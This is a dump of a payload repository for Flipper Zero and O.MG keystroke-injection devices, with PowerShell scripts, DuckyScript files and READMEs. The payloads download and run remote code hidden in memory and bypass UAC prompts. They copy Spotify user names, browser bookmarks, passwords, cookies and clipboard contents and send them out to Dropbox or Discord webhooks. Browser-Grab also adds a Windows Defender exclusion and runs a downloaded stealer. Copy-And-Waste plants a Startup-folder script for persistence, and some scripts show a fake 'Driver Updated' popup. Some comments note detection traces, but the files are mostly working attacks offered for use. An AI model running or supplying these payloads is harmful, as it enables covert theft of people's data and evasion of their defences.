$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt"
# Gets the name of the spotify user: the directory listing is redirected into $F1,
# which is created inside the Users directory because of the cd.
cd "$env:APPDATA\Spotify\Users"
Get-ChildItem > $F1
# Copy Spotify User to Temp Directory to get sent to Dropbox
# Review note: a *_spotify_users.txt file written under %APPDATA%\Spotify\Users and
# copied to %TEMP% by powershell.exe is the host artifact this step leaves behind.
Copy-Item "$F1" -Destination "$env:tmp/$F1"
function DropBox-Upload {
<#
.SYNOPSIS
Uploads one local file to the root of a Dropbox account through the Dropbox content API.
.PARAMETER SourceFilePath
Path of the file to upload (alias: -f). Its leaf name is used as the remote file name.
#>
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
# The token is a placeholder here; a deployed copy carries a real token in clear text.
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token
# Remote path is "/<file name>", i.e. the root of the Dropbox app folder or account.
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
# JSON for the Dropbox-API-Arg header: add the file, auto-rename on a name clash.
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
# The file content is sent as the POST body.
# Review note: the only destination is content.dropboxapi.com; a POST to
# /2/files/upload issued by powershell.exe is the egress indicator for this function.
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
# Upload the staged copy from the temp directory.
DropBox-Upload -f "$env:tmp/$F1"
# Removes the listing from the current directory (the Spotify Users directory after the
# earlier cd); the copy in the temp directory is not removed by this script.
rm $F1
# Shows a "Driver Updated" popup that closes after 1 second; the text is unrelated to
# what the script actually did.
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: FlipperZero/payloads/Spotify-Spy/payload.txt
================================================
REM Title: Spotify-Spy
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
REM Target: Windows 10
REM Keystroke flow: wait 2 s, open the Run dialog (GUI r), type a PowerShell one-liner, press ENTER.
REM The one-liner starts PowerShell with a hidden window (-w h), no profile (-NoP), non-interactive
REM (-NonI) and execution policy Bypass, downloads a script with iwr and runs it in memory with iex.
REM Review note: commands entered in the Run dialog are recorded in the user's RunMRU registry key
REM (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), and this flag combination
REM together with iwr/iex shows up in process-creation and PowerShell script-block logging.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: FlipperZero/payloads/Water-UnMark/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Water-UnMark!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Water-UnMark
A payload to get rid of the ugly windows activation watermark.
## Description
This script will get rid of the ugly Windows watermark by setting the `Start` value of the `svsvc` service to 4 (disabled) in the registry. This script will automatically reboot the device. This is not activating your computer!!
## Getting Started
### Dependencies
* Unactivated Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
```
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Water-UnMark/payload.txt
================================================
REM Title: Water-UnMark
REM Author: atomiczsec
REM Target OS: Windows 10
REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!
REM Keystroke flow: open the Run dialog, request an elevated PowerShell (-verb runAs), answer the
REM UAC prompt with ALT Y, set the svsvc service's Start value to 4 (disabled), then force a reboot.
REM Review note: ALT Y only gets past UAC when the logged-on user is an administrator who is shown a
REM consent prompt; an account that has to type credentials at the prompt stops the sequence here.
REM The change is a write to HKLM\SYSTEM\CurrentControlSet\Services\svsvc followed by an immediate
REM forced restart, both of which are visible in registry auditing and the System event log.
DELAY 2000
GUI r
DELAY 100
STRING powershell Start-Process powershell -verb runAs
DELAY 1000
ALT Y
DELAY 1000
STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
ENTER
DELAY 100
STRING Restart-Computer -Force
ENTER
================================================
FILE: FlipperZero/payloads/Water-UnMark/placeholder
================================================
================================================
FILE: FlipperZero/payloads/cApS-Troll/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;cApS+Troll+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# cApS-Troll
This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
## Description
This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Set the download URL with `DEFINE TARGET_URL example.com`
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec) &
[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/cApS-Troll/a.ps1
================================================
# Endless loop that toggles CAPS LOCK five times per cycle through WScript.Shell
# SendKeys: once after a 45-second wait, then four more times at 15-second intervals.
# A fresh WScript.Shell COM object is created for every key press.
while ($true) {
    foreach ($pause in 45, 15, 15, 15, 15) {
        Start-Sleep -Second $pause
        $shell = New-Object -ComObject WScript.Shell
        $shell.SendKeys('{CAPSLOCK}')
    }
}
================================================
FILE: FlipperZero/payloads/cApS-Troll/payload.txt
================================================
REM Title: cApS-Troll
REM Author: atomiczsec
REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
REM Target: Windows 10
REM Keystroke flow: wait 2 s, open the Run dialog (GUI r), type a PowerShell one-liner, press ENTER.
REM The one-liner runs PowerShell hidden (-w h) with -NoP -NonI -ep Bypass, fetches a script with
REM iwr and executes it in memory with iex; nothing is written to disk by this step.
REM Review note: the typed command is kept in the user's RunMRU registry key, and the a.ps1 it
REM loads runs until the hidden powershell.exe process is ended.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: Functions/placeholder
================================================
================================================
FILE: Functions/tidal-log.ps1
================================================
# Uploads the TIDAL desktop client's app.log of the current user to a Discord webhook.
# Define the Discord webhook URL (placeholder value on this page)
$webhookUrl = "https://discord.com/api/webhooks/XXXXXXX"
# Define the path to the app.log file
$appLogPath = "$env:USERPROFILE\AppData\Roaming\TIDAL\Logs\app.log"
# Check if the file exists
if (Test-Path $appLogPath) {
try {
# Use curl to upload the file to the Discord webhook
# The command line is assembled as a string and run through Invoke-Expression.
# Review note: the resulting process tree is powershell.exe -> curl.exe with a
# multipart "-F file1=@<path>" argument and a discord.com/api/webhooks URL, which
# is what command-line logging would record for this upload.
$curlCommand = "curl.exe -F 'file1=@$appLogPath' $webhookUrl"
Invoke-Expression $curlCommand
Write-Host "Successfully uploaded the log file to the Discord webhook."
} catch {
Write-Host "An error occurred while uploading the log file to the Discord webhook: $_"
}
} else {
Write-Host "The file $appLogPath does not exist."
}
================================================
FILE: OMG/payloads/Bookmark-Hog/BH.ps1
================================================
#Bookmark-Hog
# Stages copies of the current user's Chrome and Edge "Bookmarks" files (Default profile)
# in the temp directory under <username>-<timestamp>_<browser>_bookmarks.txt names.
# Review note: powershell.exe reading ...\User Data\Default\Bookmarks of both browsers and
# writing *_chrome_bookmarks.txt / *_edge_bookmarks.txt to %TEMP% is the host-side trace.
# See if file is a thing
# (this call only writes True/False to the output stream; the if below repeats the check)
Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The chrome bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Otherwise copy the Chrome Bookmarks file to the temp directory ($F1 is only set in this branch)
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt"
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1"
}
# See if file is a thing
# (same pattern for Edge: the result of this call is not used)
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The edge bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Otherwise copy the Edge Bookmarks file to the temp directory ($F2 is only set in this branch)
else {
$F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt"
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2"
}
function DropBox-Upload {
<#
.SYNOPSIS
Uploads one local file to the root of a Dropbox account through the Dropbox content API.
.PARAMETER SourceFilePath
Path of the file to upload (alias: -f). Its leaf name is used as the remote file name.
#>
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
# Placeholder on this page; a deployed copy holds a real bearer token in clear text.
$DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token
# Remote path is "/<file name>".
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
# JSON for the Dropbox-API-Arg header: add the file, auto-rename on a name clash.
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
# The file content is sent as the POST body.
# Review note: a POST to content.dropboxapi.com/2/files/upload from powershell.exe is
# the network indicator for this function.
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
# Upload both staged copies; $F1 and $F2 are only assigned when the matching
# bookmark file was found earlier in the script.
DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"
# Shows a "Driver Updated" popup that closes after 1 second; the text is unrelated to
# what the script did. The staged copies in the temp directory are not deleted.
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: OMG/payloads/Bookmark-Hog/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Bookmark-Hog
A payload to exfiltrate bookmarks of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the bookmark history
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: OMG/payloads/Bookmark-Hog/payload.txt
================================================
REM Title: Bookmark-Hog
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
REM (the BH.ps1 in this directory uploads the files to Dropbox; nothing is written back to the USB device)
REM Target: Windows 10, 11
REM Keystroke flow: wait 2 s, open the Run dialog (GUI r), type a PowerShell one-liner, press ENTER.
REM The one-liner runs PowerShell hidden (-w h) with -NoP -NonI -ep Bypass, fetches a script with
REM iwr and executes it in memory with iex.
REM Review note: the typed command is kept in the user's RunMRU registry key; the download cradle and
REM the script it loads are captured by PowerShell script-block logging when that is enabled.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: OMG/payloads/Bookmark-Hog/placeholder
================================================
================================================
FILE: OMG/payloads/Browser-Grab/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Browser+Grab!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Browser-Grab
A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
## Description
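This payload will exclude the C: drive on the device so Windows Defender doesn't flag the exe (note: the `b.ps1` shipped alongside this README passes `$env:tmp`, not `C:`, to `Add-MpPreference -ExclusionPath`)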
This payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
Finally, discord will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Admin privileges on the Device you are targeting
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: OMG/payloads/Browser-Grab/b.ps1
================================================
function Upload-Discord {
<#
.SYNOPSIS
Posts a text message and/or a file to a Discord webhook.
.PARAMETER file
Optional path of a file to upload; sent as multipart form field "file1" with curl.exe.
.PARAMETER text
Optional message text; sent as JSON together with the local user name.
#>
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
# Placeholder on this page; a deployed copy embeds the real webhook URL.
$hookurl = 'YOUR-DISCORD-WEBHOOK'
# The message is posted under the name of the logged-on user.
$Body = @{
'username' = $env:username
'content' = $text
}
# Text and file are sent independently; each step is skipped when its argument is empty.
if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
# Review note: the file upload spawns curl.exe with "-F file1=@<path>" and the webhook URL
# on its command line, so process command-line logging records both.
if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}
# Add $env:tmp to exclusions so Windows Defender doesn't flag the exe we will download
# Review note: Add-MpPreference needs an elevated session (the accompanying payload.txt starts
# PowerShell with -verb runas). The exclusion is stored under
# HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths and Defender logs the configuration
# change as event 5007 in its Operational log; an exclusion on a temp directory is a strong
# alerting candidate.
Add-MpPreference -ExclusionPath $env:tmp
# Download the exe and save it to temp directory
# (fetched from the repository's Assets folder; the binary's contents are not shown on this page)
iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe"
# Execute the Browser Stealer
# Runs with a hidden window and waits for it to exit before continuing.
cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait
# Exfiltrate the loot to discord
# The $env:tmp\results folder is zipped to browserdata.zip in the temp directory and posted
# to the webhook; browser.exe, results and the zip are not removed afterwards.
Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip
Upload-Discord -file "$env:tmp\browserdata.zip"
================================================
FILE: OMG/payloads/Browser-Grab/payload.txt
================================================
REM Title: Browser-Grab
REM Author: atomiczsec
REM Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
REM Target: Windows 10
REM Keystroke flow: open the Run dialog, start an elevated PowerShell (saps ... -verb runas), answer
REM the UAC prompt with ALT y, then type a download-and-execute pipeline (iwr ... | iex) into the
REM elevated window.
REM Review note: ALT y only gets past UAC when the logged-on user is an administrator who is shown a
REM consent prompt; an account that has to enter credentials stops the sequence at that point.
REM The elevated window is visible here (no -w h), and the Run-dialog command is kept in RunMRU.
DELAY 2000
GUI r
DELAY 1000
STRING powershell saps powershell -verb runas
ENTER
DELAY 1000
ALT y
DELAY 1000
STRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
================================================
FILE: OMG/payloads/Copy-And-Waste/I.bat
================================================
@echo off
REM Changes to %USERPROFILE%\AppData\Roaming and runs c.ps1 from there in a hidden,
REM non-interactive PowerShell with execution policy Bypass.
REM Review note: per the README this file is placed in the user's Startup folder, so it is
REM launched at every logon; a .bat in Startup that starts powershell with -w h -Ep Bypass
REM on a script in AppData\Roaming is the persistence artifact to look for.
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause
================================================
FILE: OMG/payloads/Copy-And-Waste/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Copy-And-Waste
A payload to exfiltrate clipboard contents
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistence and execute c.ps1 on reboot/startup
**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click
Then the contents will then be sent to the discord webhook for viewing pleasure
For killing the script press both Ctrl buttons at the same time [It will resume at reboot]
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec) &
[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: OMG/payloads/Copy-And-Waste/c.ps1
================================================
Add-Type -AssemblyName WindowsBase
Add-Type -AssemblyName PresentationCore
function dischat {
<#
.SYNOPSIS
Posts a text message to a Discord webhook under the local user's name.
.PARAMETER con
The message text to send (mandatory, position 0).
#>
[CmdletBinding()]
param (
[Parameter (Position=0,Mandatory = $True)]
[string]$con
)
# Placeholder on this page; a deployed copy embeds the real webhook URL.
$hookUrl = 'YOUR DISCORD WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $con
}
# Review note: every call is an outbound POST from powershell.exe to the webhook host,
# carrying the supplied text in the request body.
Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
}
# Send whatever is on the clipboard when the script starts.
dischat (get-clipboard)
